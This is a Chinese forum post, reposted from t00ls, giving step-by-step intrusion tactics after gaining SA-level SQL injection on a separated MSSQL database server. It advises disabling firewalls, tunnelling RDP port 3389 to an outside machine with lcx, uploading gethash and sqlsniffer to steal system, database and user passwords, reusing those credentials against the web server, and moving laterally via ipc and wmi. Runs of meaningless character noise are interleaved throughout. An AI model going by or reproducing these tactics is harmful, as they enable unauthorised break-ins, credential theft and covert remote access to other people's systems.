当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。9 j: f9 ?8 m; P
! J. j# w3 V; O2 u' G& Q
6 `6 B. [. P; ]5 d% V( h$ i
/ v, N. K* H; ~1 u# w& M" e3 `SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
+ I" y; y; K* p7 B! j& Q* H3 h6 x; g# y1 H! } Z& B4 U5 h. p3 R/ A- c
3 r7 w# s, [9 A* h2 K+ q一、DB机有公网IP.. y0 \3 _; H$ v3 P5 p! X% ]9 }8 c" A
. T- g. \. W# b2 _- s! T" m1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.# [0 j; ?, A2 k% i
% t$ X- j+ z# [4 U+ P3 N/ f- Y0 W
# G1 L7 Y8 a. l4 P& e2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
: P, g0 ~0 o. G+ ^7 D" l! Z- G: I+ ~% K( ]$ m2 s
6 k) ?2 J$ P1 Z# m
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
7 @# s" ]& b3 \1 O- L7 K j$ V' i$ K) k* C3 v; [' b+ s
3 j0 q0 k; p$ G K: w" f
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.; u8 {6 ?6 Z: @8 q
: o4 D. U5 ^7 r+ g6 t* t% X5 m
7 d" f9 `& {5 p% N$ X- N
\6 M" u& F+ Y- h7 \二、DB机只有内网IP
$ B' d4 U \# ?' v0 a8 i; }1 @0 }. Q- d/ `
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
9 w' a1 t8 o( Q0 M# q {
2 \- F( ^; o' ^8 [$ w8 b' S0 _1 K4 f: J$ H4 F. W
2:停掉防火墙和IP策略再从内往外扫描.$ V& y$ K# B# J) c$ z5 Z7 u2 T
6 D M6 k' ]; J. S/ c8 B' {4 {& {: `1 H. G
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.. m. k" `& N$ V3 L( X
) D- f. ~. V9 {' w
: Y- ^& W* k0 v# s2 X& a6 [
4:学会密码规律分析往往会有惊喜.
9 J. C: ]. w6 C0 r% p, H; C% O, X# u8 u( [* j1 t. p8 r
! s6 m" E8 Q7 u0 R) c+ c- K6 |" E
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
/ ~ S: \: y( U2 B, _# G) _) a& ]7 {- O1 H" A9 {# N6 i0 e
0 r; ]2 M! G9 g' C9 r3 v
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |